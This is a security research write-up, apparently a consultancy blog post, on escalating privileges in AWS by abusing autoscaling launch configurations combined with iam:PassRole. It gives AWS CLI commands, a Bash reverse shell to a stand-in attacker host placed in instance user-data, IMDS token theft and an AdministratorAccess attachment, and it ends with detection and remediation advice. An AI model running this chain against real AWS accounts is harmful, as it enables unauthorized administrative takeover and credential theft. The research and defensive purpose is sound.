+1 (512) 588 6950
This article is about a privilege escalation abusing AWS managed policies and default configurations.
IAM permission misconfigurations and privilege escalations on AWS have been thoroughly discussed in the past, especially from Rhino Security Labs and Bishop Fox, so at I created an AWS laboratory account to test old and new attacks on the AWS infrastructure, especially the IAM service.
While searching for strange permissions provided by Amazon managed policies and their combination it was found that the policy AmazonElasticMapReduceFullAccess (v7) allows the classic privilege escalation permissions iam:PassRole and ec2:RunInstance (and many others!).
This is nothing new since with these two permissions, it is possible to create a new EC2 instance, pass a role with higher permissions than the actual user, login into the instance, and use the assumed role in the EC2 service.
iam:PassRole permission can allow a service to assume a role and perform anctions on its behalf.
Any AWS professional will and shall avoid using this policy or create a deny policy to at least restrict the iam:PassRole only to specific roles or services.
Amazon Elastic Map Reduce (EMR) service is a big data platform for running large-scale distributed data processing jobs, SQL queries, and machine learning (ML) applications so I searched for other policies that should be associated with a data scientist user.
The DataScientist policy, obviously, caught my attention because of the following permissions:
This policy is just a time bomb because if the attacker user/role gains the iam:PassRole permission can perform lots of privilege escalation paths abusing the CloudFormation stack, a custom Lambda function, EC2 instances etc.
Amazon is aware of this problem an decided to deprecate this policy: here the documentation. In fact, the new policy has restricted permissions on iam:PassRole.
To increase the difficulty then a policy called DemoDenyPrivEscs is created. This policy exploicitly denies the following actions:
From the DataScientist policy another action got the attention autoscaling:*.
Now that the classic privilege escalations paths are denied by the above policy the interesting path is using somehow the EC2 Auto Scaling service to execute the privilege escalation.
The scenario is simple:
N.B.: obviously denying the iam:PassRole globally will prevent basically all major privilege escalations; but here we are experimenting.
If you have never used the Autoscaling function the AWSServiceRoleForAutoScaling can’t be used to start the service.
The Amazon EC2 Auto Scaling service helps organizations scale EC2 instances to maintain application availability and allows them to automatically start or terminate instances according to defined workload rules.
The service requires a launch configuration and an autoscaling group:
demo-DataScientist can then create an EC2 launch configuration and an autoscaling group with an AMI image which the may have attacker has access to.
A launch configuration is a template that an EC2 Auto Scaling group uses to launch EC2 instances. When a launch configuration is created, information for the instances such as the ID of the Amazon Machine Image (AMI), the instance type, a key pair, one or more security groups, and a block device mapping are specified.
The attacker then creates a launch configuration that:
The attacker now find the latest Amazon AMI (AWSCLI installed by default and support user-data scripts):
aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn-ami-hvm-*-x86_64-gp2' 'Name=state,Values=available' | jq -r '.Images | sort_by(.CreationDate) | last(.).ImageId'
The AMI image used by the attacker must be accessible from the attacker itself and there are some choices:
In this phase the goal is to have access to the instance.
Using the above output it’s possible to create a launch configuration:
aws autoscaling create-launch-configuration --launch-configuration-name demo-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
The reverse-shell.sh file contains the script executed on the EC2 at boot:
#!/bin/bash/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
The script just executes a reverse shell using Bash, allowing the attacker to access the EC2 instance once started without access to AWS VPC or EC2 SSH Keys.
Generally any kind of reverse shell can be used since the attacker can forge the startup script; a more complex one can involve obfuscation, more stable connections, download of complex beacons, persistence and malware.
Now the launch configuration is created; the service needs also an autoscaling policy to start/stop the instances.
The attacker then creates the autoscaling group using the launch configuration evilLC created above to actually start EC2 instances:
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo-ASG --launch-configuration-name demo-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
The VPC subnets selected should at least allow the egress traffic from the EC2 to the attacker IP and port; normally egress security groups are pretty wide and the attacker is spoilt for choice.
Using the ec2:DescribeSubnets permission defined in AmazonElasticMapReduceFullAccess the attacker can select the appropriate subnet IDs.
Once the auto scaling group is created, AWS check if the number of EC2s are in the limits of the defined autoscaling policy. Since no EC2 in that scaling group should be available a new EC2 is created and then spawned.
A reverse shell is received to the attacker server on the bootstrap of the instance:
With this shell it is now possible to use the demo-EC2Admin role within the EC2 instance or dump session token using a simple HTTP GET request to the IMDS.
Since AWS is aware that the EC2 role shouldn’t be used outside the AWS organization any use of the session token from outside AWS triggers an alert with signature UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS.
From the reverse shell the attacker can now gain Administrative privileges:
aws iam attach-role-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --role-name demo-DataScientist
The minimum required privileges for this privilege escalation are:
This privilege escalation is quite easy to spot on your AWS account, especially if you are using IaC to deploy and manage AWS resources: just search for any usage of the autoscaling:* action or DataScientist policy combined with iam:PassRole.
In this gist you can find the Terraform code to deploy a minimum viable scenario to exploit this privilege escalation.
The problem here is not specifically the usage of an AWS managed policy but the combination of autoscaling and iam:PassRole permissions.
To actually perform the attack the attacker must know the role name to attach to the EC2 instance and the security group that allows egress traffic.
The DataScientist policy allows iam:ListRole and, even if the attacker does not know the correct role, can guess it from the list or via trial-and-error; the same approach can be use to list security groups, VPCs and subnets.
PMapper, from nccgroup, is able to display this privesc but does not say how to actually exploit it:
In AWS, IAM Principals such as IAM Users or IAM Roles have their permissions defined using IAM Policies. These policies describe different actions, resources, and conditions where the principal can make a given API call to a service.
Administrative principals can call any action with any resource, as in the AdministratorAccess AWS-managed policy. However, some permissions may allow another non-administrative principal to gain access to an administrative principal. This represents a p* role/demo-DataScientist can escalate privileges by accessing the administrative principal role/demo-EC2Admin:
rivilege escalation risk.
* role/demo-DataScientist can use the EC2 Auto Scaling service role and create a launch configuration to access role/demo-EC2Admin
A quick fix is to create a policy to deny the auto scaling privileges to roles or users but this should be just a patch to allow a more precise remediation and tuning of the iam:PassRole permission.
The remediation is to follow the AWS security best practices for Identity and Access Management:
As a rule of thumb the best way is to avoid using AWS managed policies since they are created to just make things work without troubling and are designed to be overly permissive.